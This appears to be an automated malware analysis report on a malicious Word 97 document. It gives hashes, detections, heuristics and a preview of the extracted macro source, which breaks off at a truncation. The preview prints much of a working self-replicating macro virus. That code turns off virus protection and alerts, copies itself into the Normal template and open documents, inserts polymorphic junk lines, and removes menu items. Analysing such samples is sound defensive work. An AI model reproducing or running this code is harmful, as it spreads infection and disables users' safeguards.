Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 068706fe1cecc462…

MALICIOUS

Office (OLE)

35.5 KB Created: 1980-01-11 06:24:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 1b64f5df94040922f14c957d70bd44e7 SHA-1: 24df0f571630ef638082a2f1ec2f14522ec5c272 SHA-256: 068706fe1cecc462718ac2763fa92a7a0e4830bc74102846a283688653c115a0
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with multiple signatures, including Win.Trojan.Pivis-2 and Doc.Trojan.Agnes-5. It contains a legacy WordBasic AutoOpen macro, which is a strong indicator of malicious intent. The macro attempts to disable security features like macro warnings and virus protection, and its obfuscated nature suggests it is designed to download or execute a second-stage payload.

Heuristics 4

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19056 bytes
SHA-256: b5ccc528004f1e879ce26940d3d1c7785daee6c9f7ba2d4c31ccf635713a8d65
Detection
ClamAV: Doc.Trojan.Agnes-5
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AL"
Sub RuLeQp9075()
On Error Resume Next
WordBasic.DisableAutoMacros 0
ActiveDocument.ReadOnlyRecommended = False
With Application
.EnableCancelKey = wdCancelDisabled
.DisplayAlerts = wdAlertsNone
End With
With Options
.ConfirmConversions = False
.VirusProtection = False
End With
Randomize
ActiveLines = Application.VBE.ActiveVBProject.VBComponents("AL").CodeModule.CountOfLines
If ActiveLines > 300 Then
With Application.VBE.ActiveVBProject.VBComponents("AL").CodeModule
For TheLine = 1 To .CountOfLines
If Left(.Lines(TheLine, 1), 3) = "Rem" Then .DeleteLines TheLine
Next TheLine
End With
Else
With Application.VBE.ActiveVBProject.VBComponents("AL").CodeModule
PolySize = Int(Rnd * 10)
For PolyMorphic = 1 To PolySize
PolyString = ""
PolyLines = .CountOfLines
RndLine = Int(Rnd * PolyLines) + 1
StringSize = Int(Rnd * 39) + 1
For SomeString = 1 To StringSize
PolyString = PolyString & Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22))
Next SomeString
.InsertLines RndLine, "Rem " & PolyString
Next PolyMorphic
End With
End If
If Day(Now()) = 10 Then
Application.Caption = "AGNES LEE"
End If
Application.CommandBars("View").Controls(6).Delete
Application.CommandBars("Format").Controls(12).Delete
Application.CommandBars("Tools").Controls(12).Delete
Application.CommandBars("Tools").Controls(13).Delete
End Sub
Sub Tl569()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
With Options
.SaveNormalPrompt = False
.VirusProtection = False
.ConfirmConversions = False
End With
Application.VBE.ActiveVBProject.VBComponents("AL").Export "C:\AL.sys"
With Dialogs(wdDialogFileSummaryInfo)
.Author = Chr(74) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(84) + Chr(119) + Chr(111) + Chr(102) + Chr(108) + Chr(111) + Chr(119) + Chr(101) + Chr(114) + Chr(32) + Chr(45) + Chr(61) + Chr(91) + Chr(76) + Chr(105) + Chr(110) + Chr(101) + Chr(90) + Chr(101) + Chr(114) + Chr(216) + Chr(32) + Chr(86) + Chr(120) + Chr(32) + Chr(84) + Chr(101) + Chr(97) + Chr(109) + Chr(93) + Chr(61) + Chr(45)
.Comments = "WM97.AL" & Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(76) + Chr(105) + Chr(77) + Chr(69) + Chr(32) + Chr(49) + Chr(46) + Chr(111)
.Keywords = "LiME ID: 18288-Tl-5699075-Lm.W"
.Execute
End With
For x = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(x).Name = "AL" Then RfEfVg8187VhPkUu569 = True
Next x
For y = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(y).Name = "AL" Then VlCjMk457RuLeQp9075 = True
Next y
If RfEfVg8187VhPkUu569 = True And VlCjMk457RuLeQp9075 = False Then Set TkErNq244PwQuUk36 = ActiveDocument.VBProject
If RfEfVg8187VhPkUu569 = False And VlCjMk457RuLeQp9075 = True Then Set TkErNq244PwQuUk36 = NormalTemplate.VBProject
If RfEfVg8187VhPkUu569 = True And VlCjMk457RuLeQp9075 = True Then GoTo Ende_
TkErNq244PwQuUk36.VBComponents.Import "C:\AL.sys"
If VlCjMk457RuLeQp9075 = False Then ActiveDocument.SaveAs (WordBasic.[FileName$]()), FileFormat:=wdFormatDocument
If RfEfVg8187VhPkUu569 = False Then NormalTemplate.Save
Ende_:
Call RuLeQp9075
End Sub
Rem ExKfKzQmJwLyTlNwAoKrVgBxNjMjKeNqCoRlMgUkCkKnHjEhItTrJtPpJsJwHrGmAvKsBnTfLvPoNo
Sub AutoOpen()
On Error Resume Next
Call Tl569
Call RuLeQp9075
Rem Gj
End Sub
Sub AutoExit()
On Error Resume Next
Call Tl569
Call RuLeQp9075
End Sub
Sub AutoNew()
Rem JhCeSoNtPfLxPmTpSwUnAvAqFqSwTrNeArUsFfMzUi
On Error Resume Next
Call Tl569
Call RuLeQp9075
End Sub
Sub AutoExec()
On Error Resume Next
Call Tl569
Call RuLeQp9075
End Sub
Sub DateiNeu()
On Error Resume Next
Dialogs(wdDialogFileNew).Show
Call Tl569
Call RuLeQp9075
End Sub
Sub DateiOffnen()
On Error Resume Next
Dialogs(wdDialogFileOpen).Show
Rem IgHmRoExKsFqGgTyAhQnLkEoDmMtFrFpFgJzOlKr
Call Tl569
... (truncated)